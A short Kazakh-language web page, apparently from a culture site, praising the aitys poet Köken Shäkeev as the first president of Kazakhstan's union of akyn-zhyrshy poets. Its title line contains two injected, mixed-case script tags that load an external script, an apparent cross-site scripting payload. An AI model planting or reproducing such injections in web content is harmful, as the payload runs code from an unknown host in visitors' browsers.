Көкен Шәкеев<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

21.08.2020

Көкен Шәкеев  Қазақстанның ақын-жыршылар одағының бірінші президенті болса, екінші президенті Көкеннің ізбасары - Қонысбай Әбілов еді. Әр өнердің өз құпиясы, өзінің қыры мен сыры бар. Сол сиқырды жетік игеріп, өзінің сүйген өнерінің иесі бола білу - әр өнерпаздың өз деңгейін көрсетеді, арманын меңзейді. Айтыс ақындары -  нағыз арпалыстың, шартпа - шұрт майдангер шайқастың ақындары. Мықты айтыскер өмірді білмей өрге баса алмайды. Ал Көкен Шәкеев өмір университетінің нағыз профессоры еді. Анасының ақ сүтімен ере келген бір ғажайып мінез - өр құбылысты өлеңмен өрнектеу, әнге бөлеу, поэзия бесігіне құндықтау болса, сол құдіретті қүш Көкен Шәкеевте азаматтық ең зор құрал болды. 
«Өлең - өмір өлмейтін аңғарғанға, нұр жауар көкірегіңе Күн мен Айдан» - деп ақын көкірекке нұр құю жайлы жазады.

Просмотров: 488


Пікір қосу



Деректерді қолтаңбаға қосу